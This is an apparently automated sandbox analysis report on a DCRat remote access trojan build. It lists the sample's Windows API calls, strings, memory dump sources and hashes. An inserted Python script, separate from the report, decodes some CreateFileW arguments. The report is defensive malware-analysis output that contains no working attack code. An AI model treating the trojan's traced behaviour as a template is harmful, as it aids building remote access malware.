                                        • Opcode Fuzzy Hash: decc2f1c897d7eaf378fa89fd14fc393dd09fdd4c7c2550ffcf4e721b09cbfb4
                                        • Instruction Fuzzy Hash: 9F11B632284280BFE6219FACDD4DF6A3769EB5B700F144006F241970A1C7AD9906D777
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 1857242416-834177443
                                        • Opcode ID: b9ec35e0602d763efbb05bfbecd7921c6ae961fc8ed8e0118e3d8b970b1e67f2
                                        • Instruction ID: f13264c8403f6949b237318ca82fb667afe5eb35bffe0775f468a157803ad8e4
                                        • Opcode Fuzzy Hash: b9ec35e0602d763efbb05bfbecd7921c6ae961fc8ed8e0118e3d8b970b1e67f2
                                        • Instruction Fuzzy Hash: 2D214D7294030CEBEB31DEA4DC4AFEA7BA8AB05300F040512FE1596192E379EA59DB51
                                        APIs
                                        • _swprintf.LIBCMT ref: 0073B51E
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • _wcschr.LIBVCRUNTIME ref: 0073B53C
                                        • _wcschr.LIBVCRUNTIME ref: 0073B54C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 525462905-3142399695
                                        • Opcode ID: 5f11fe1c3bb84ddd337d3b7a4363c5e52e8826c01f68d591bae508829a861777
                                        • Instruction ID: 947b7ffc33cf555fa65e9f28fe069774f53163f916c2a0c03012b03c6c2ec0ee
                                        • Opcode Fuzzy Hash: 5f11fe1c3bb84ddd337d3b7a4363c5e52e8826c01f68d591bae508829a861777
                                        • Instruction Fuzzy Hash: F701F953904311FAE7206BB59C8BD6BB7ACDE953A1F50441AFE45C6083FB38D964C2A1
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 007406F3
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 007406FD
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 0074070D
                                        Strings
                                        • Thread pool initialization failed., xrefs: 00740725
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: 2a14d5477a31c2630881fb832ce894d992fae41fa214fd401c280df972ac13c9
                                        • Instruction ID: f272007626d40c5f2bc017568deacea740bc17d1ecb22ae37c18ab61d85d1abf
                                        • Opcode Fuzzy Hash: 2a14d5477a31c2630881fb832ce894d992fae41fa214fd401c280df972ac13c9
                                        • Instruction Fuzzy Hash: 3B11A3B1540708AFD3215F75C888AA7FBECFB95744F10882EF2DB82200D7B96980CB94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: 6b67097b27c16316374d1f17908c5af30e837f891094aa4625d217422af3b500
                                        • Instruction ID: 9015e90cc17590f5655a23f5dfefe23cfbf512a7390902452107882075bbb38f
                                        • Opcode Fuzzy Hash: 6b67097b27c16316374d1f17908c5af30e837f891094aa4625d217422af3b500
                                        • Instruction Fuzzy Hash: B401D471640285EFCB619F19EC48E9A3BA9E7043D0F148431F849D2231C7BD9CA0EBA6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                        • Instruction ID: f3947312975c4da285f1d91cb9608a1d96fc11ee29c732d91f3f4772d9f2d925
                                        • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                        • Instruction Fuzzy Hash: BCA15671900386DFEB21CE68C8917EEBBA5EF51311F18416DEE859B281D3BC9D4AC750
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007380B7,?,?,?), ref: 0073A351
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007380B7,?,?), ref: 0073A395
                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007380B7,?,?,?,?,?,?,?,?), ref: 0073A416
                                        • CloseHandle.KERNEL32(?,?,00000000,?,007380B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0073A41D
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: 6be1d80c20c0b51b0702a8e64312f77e4af19792879ea50d608a6b7acdbdacea
                                        • Instruction ID: 8054cec8fa674e56aa75894bff04775ab270008b67b35b559e79b0545c783181
                                        • Opcode Fuzzy Hash: 6be1d80c20c0b51b0702a8e64312f77e4af19792879ea50d608a6b7acdbdacea
                                        • Instruction Fuzzy Hash: 4141BE31248381AAE731DF64DC46FABBBE4AF95700F04091DF5D1931C2D66D9A48DB53
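The API lines in the block above list raw stack slots, not decoded arguments: CreateFileW takes seven parameters, so the slots after the seventh are the caller's stack (the recurring 007380B7 is a return address), and "?" marks a slot the sandbox could not resolve. The following Python, an added example that is not part of the Joe Sandbox report or of the analysed sample, parses the three API reference lines copied from this block (constructed input) into structured calls, trims each to its real arity, and translates the CreateFileW constants into Windows SDK names. The ARITY table and the constant values are taken from the Win32 API documentation; the interpretation that GENERIC_WRITE + OPEN_EXISTING + FILE_FLAG_BACKUP_SEMANTICS followed by SetFileTime is an existing directory being opened to set its timestamps (FILE_FLAG_BACKUP_SEMANTICS is what allows CreateFileW to return a directory handle) is the editor's reading of these lines, not a claim made by the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the three API reference lines copied from the report block above.
REPORT_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007380B7,?,?,?), ref: 0073A351",
    "• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007380B7,?,?,?,?,?,?,?,?), ref: 0073A416",
    "• CloseHandle.KERNEL32(?,?,00000000,?,007380B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0073A41D",
]

# Real parameter counts (Win32 documentation). The report prints a fixed number of stack
# slots per call (16 in the lines above); slots past the arity are caller stack, not arguments.
ARITY = {"CreateFileW": 7, "SetFileTime": 4, "CloseHandle": 1}

# Windows SDK constants for the CreateFileW arguments decoded below.
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = [(0x80000000, "FILE_FLAG_WRITE_THROUGH"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
         (0x20000000, "FILE_FLAG_NO_BUFFERING"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
         (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"), (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
         (0x80, "FILE_ATTRIBUTE_NORMAL"), (0x4, "FILE_ATTRIBUTE_SYSTEM"),
         (0x2, "FILE_ATTRIBUTE_HIDDEN"), (0x1, "FILE_ATTRIBUTE_READONLY")]

# Matches 'Api.MODULE(slot,slot,...), ref: ADDR'; the leading bullet is ignored.
LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass
class ApiRef:
    name: str
    module: str
    args: List[Optional[int]]   # None marks a '?' slot the sandbox could not resolve
    ref: int                    # address of the call instruction


def parse_api_line(line: str) -> ApiRef:
    """Parse one report line and trim the stack slots to the API's real parameter count."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    name, module, raw_slots, ref = m.groups()
    slots = [None if s.strip() == "?" else int(s, 16) for s in raw_slots.split(",")]
    arity = ARITY.get(name, len(slots))   # unknown API: keep every slot
    return ApiRef(name, module, slots[:arity], int(ref, 16))


def decode_mask(value: Optional[int], table) -> List[str]:
    """Expand a bitmask into SDK flag names; bits absent from the table are kept as hex."""
    if value is None:
        return ["?"]
    names = [n for bit, n in table if value & bit]
    leftover = value & ~sum(bit for bit, _ in table) & 0xFFFFFFFF
    if leftover:
        names.append(hex(leftover))
    return names


def describe_createfilew(call: ApiRef) -> Dict[str, object]:
    """Translate the numeric CreateFileW arguments into their SDK names."""
    if call.name != "CreateFileW" or len(call.args) != 7:
        raise ValueError("expected a parsed CreateFileW call")
    _path, access, share, _sec, disp, flags, _template = call.args
    return {
        "access": decode_mask(access, ACCESS),
        "share": decode_mask(share, SHARE),
        "disposition": "?" if disp is None else DISPOSITION.get(disp, hex(disp)),
        "flags": decode_mask(flags, FLAGS),
        "ref": f"{call.ref:08X}",
    }


if __name__ == "__main__":
    for call in map(parse_api_line, REPORT_LINES):
        print(call.name, ["?" if a is None else hex(a) for a in call.args])
        if call.name == "CreateFileW":
            print(describe_createfilew(call))
```

Running it on the lines above yields GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS for the first CreateFileW call; the SetFileTime and CloseHandle calls shrink to four and one argument respectively, which is the quickest way to stop reading return addresses as parameters when working through these blocks.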
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007589AD,?,00000000,?,00000001,?,?,00000001,007589AD,?), ref: 0075C0E6
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0075C16F
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007567E2,?), ref: 0075C181
                                        • __freea.LIBCMT ref: 0075C18A
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00749DBE
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00749DCD
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00749DDB
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00749DE9
                                         Similarity
                                         • API ID: CapsDevice$Release
                                         • String ID:
                                         • API String ID: 1035833867-0
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00752016
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0075201B
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00752020
                                          • Part of subcall function 0075310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0075311F
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00752035
                                         Similarity
                                         • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                         • String ID:
                                         • API String ID: 1761009282-0
                                        APIs
                                          • Part of subcall function 00749DF1: GetDC.USER32(00000000), ref: 00749DF5
                                          • Part of subcall function 00749DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00749E00
                                          • Part of subcall function 00749DF1: ReleaseDC.USER32(00000000,00000000), ref: 00749E0B
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00749F8D
                                          • Part of subcall function 0074A1E5: GetDC.USER32(00000000), ref: 0074A1EE
                                          • Part of subcall function 0074A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0074A21D
                                          • Part of subcall function 0074A1E5: ReleaseDC.USER32(00000000,?), ref: 0074A2B5
                                         Similarity
                                         • API ID: ObjectRelease$CapsDevice
                                         • String ID: (
                                         • API String ID: 1061551593-3887548279
                                         Similarity
                                         • API ID: _swprintf
                                         • String ID: %ls$%s: %s
                                         • API String ID: 589789837-2259941744
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737730
                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007378CC
                                          • Part of subcall function 0073A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A458
                                          • Part of subcall function 0073A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0073A27A,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A489
                                         Similarity
                                         • API ID: File$Attributes$H_prologTime
                                         • String ID: :
                                         • API String ID: 1861295151-336475711
                                         Similarity
                                         • API ID:
                                         • String ID: UNC$\\?\
                                         • API String ID: 0-253988292
                                         Similarity
                                         • API ID:
                                         • String ID: Shell.Explorer$about:blank
                                         • API String ID: 0-874089819
                                        APIs
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00050160,0074A990,?,?), ref: 0074D4C5
                                         Similarity
                                         • API ID: DialogParam
                                         • String ID: GETPASSWORD1$xjx
                                         • API String ID: 665744214-132524196
                                        APIs
                                          • Part of subcall function 0073EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0073EB92
                                          • Part of subcall function 0073EB73: GetProcAddress.KERNEL32(007781C0,CryptUnprotectMemory), ref: 0073EBA2
                                        • GetCurrentProcessId.KERNEL32(?,?,?,0073EBEC), ref: 0073EC84
                                        Strings
                                        • CryptProtectMemory failed, xrefs: 0073EC3B
                                        • CryptUnprotectMemory failed, xrefs: 0073EC7C
                                         Similarity
                                         • API ID: AddressProc$CurrentProcess
                                         • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                         • API String ID: 2190909847-396321323
                                         Similarity
                                         • API ID: _free
                                         • String ID: Xv
                                         • API String ID: 269201875-1716690856
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0074F25E
                                        • ___raise_securityfailure.LIBCMT ref: 0074F345
                                         Similarity
                                         • API ID: FeaturePresentProcessor___raise_securityfailure
                                         • String ID: 8y
                                         • API String ID: 3761405300-1229904623
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00010000,007409D0,?,00000000,00000000), ref: 007408AD
                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 007408F4
                                          • Part of subcall function 00736E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00736EAF
                                         Similarity
                                         • API ID: Thread$CreatePriority__vswprintf_c_l
                                         • String ID: CreateThread failed
                                         • API String ID: 2655393344-3849766595
                                        APIs
                                          • Part of subcall function 00758FA5: GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                          • Part of subcall function 00758FA5: _free.LIBCMT ref: 00758FDC
                                          • Part of subcall function 00758FA5: SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                          • Part of subcall function 00758FA5: _abort.LIBCMT ref: 00759023
                                        • _abort.LIBCMT ref: 0075B2E0
                                        • _free.LIBCMT ref: 0075B314
                                         Similarity
                                         • API ID: ErrorLast_abort_free
                                         • String ID: v
                                         • API String ID: 289325740-2951754918
                                        APIs
                                          • Part of subcall function 0073DA98: _swprintf.LIBCMT ref: 0073DABE
                                          • Part of subcall function 0073DA98: _strlen.LIBCMT ref: 0073DADF
                                          • Part of subcall function 0073DA98: SetDlgItemTextW.USER32(?,0076E154,?), ref: 0073DB3F
                                          • Part of subcall function 0073DA98: GetWindowRect.USER32(?,?), ref: 0073DB79
                                          • Part of subcall function 0073DA98: GetClientRect.USER32(?,?), ref: 0073DB85
                                        • GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                        • SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0
                                        • API String ID: 2622349952-4108050209
                                        • Opcode ID: 860ad31a00d6fad0a601667e967fc0cc737b4d2c27f428ced6246154fe816665
                                        • Instruction ID: 9b9f983a93aa7b7a1dafc7ed25a524cad7430620e1d78d1d05567899f9291362
                                        • Opcode Fuzzy Hash: 860ad31a00d6fad0a601667e967fc0cc737b4d2c27f428ced6246154fe816665
                                        • Instruction Fuzzy Hash: 10F0AF3014428CA6FF252F608C0DBE93B98BB12345F48D014FD4A555A3C77EC9A6EB50
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00740A78,?), ref: 00740854
                                        • GetLastError.KERNEL32(?), ref: 00740860
                                          • Part of subcall function 00736E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00736EAF
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00740869
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        • Opcode ID: 0aac769611f8b01c77d7a0e106ce70918ffb176a3f5c0b64283461c2b9f307f8
                                        • Instruction ID: 80c454e1d693b9355b1f2f02da210477120fa77b4f979eee0e6b45e3a1528eba
                                        • Opcode Fuzzy Hash: 0aac769611f8b01c77d7a0e106ce70918ffb176a3f5c0b64283461c2b9f307f8
                                        • Instruction Fuzzy Hash: A0D05B7554813076DA1027249C0DDAF79056F52770F208714F63A551F5DB6D095581D5
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,0073D32F,?), ref: 0073DA53
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0073D32F,?), ref: 0073DA61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: a09927b80f34cd7feb2788293808f414afb9a18f5a79b13534014e27c67320c0
                                        • Instruction ID: 873f60aa8c1623f9c17d3f2849553da2c6253e89ece36fef6de077b0fbde0643
                                        • Opcode Fuzzy Hash: a09927b80f34cd7feb2788293808f414afb9a18f5a79b13534014e27c67320c0
                                        • Instruction Fuzzy Hash: D1C0127228A350B6EB302760BD0DB832A49AB10B12F09444CF642DA1D0DAFDDE48CAA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yU_H
                                        • API String ID: 0-404771944
                                        • Opcode ID: 3c36206f7ac005d54159c02f6647ca6bf77bbb3e6f4275cfbec40393459bf96f
                                        • Instruction ID: 6caca0c346cd0186c6af763557fdf2ed734dbc4091d49616972f42e8816772fc
                                        • Opcode Fuzzy Hash: 3c36206f7ac005d54159c02f6647ca6bf77bbb3e6f4275cfbec40393459bf96f
                                        • Instruction Fuzzy Hash: DCA1F731B18A0D4FDBA4EB6CD8516B9B3E2EF99750F4101BAE44EC3295DE34AD428781
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yU_H
                                        • API String ID: 0-404771944
                                        • Opcode ID: 14387dcd654ca69549df67181f18e16a934d2b41990ec5d0cb1858e53b656377
                                        • Instruction ID: 00ef8ba1fdd516e63736e190972970e9ba91306a862c7ed03a397eff9e43c47c
                                        • Opcode Fuzzy Hash: 14387dcd654ca69549df67181f18e16a934d2b41990ec5d0cb1858e53b656377
                                        • Instruction Fuzzy Hash: D1A10631B18A0D4FDBA4EB6CD851AB9B3E2EF98750F01017AE44EC3295DE34AD428781
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1e18e1193ec8fa09332ef06e6417f96d8446030292157e8fd544e391baa78a1
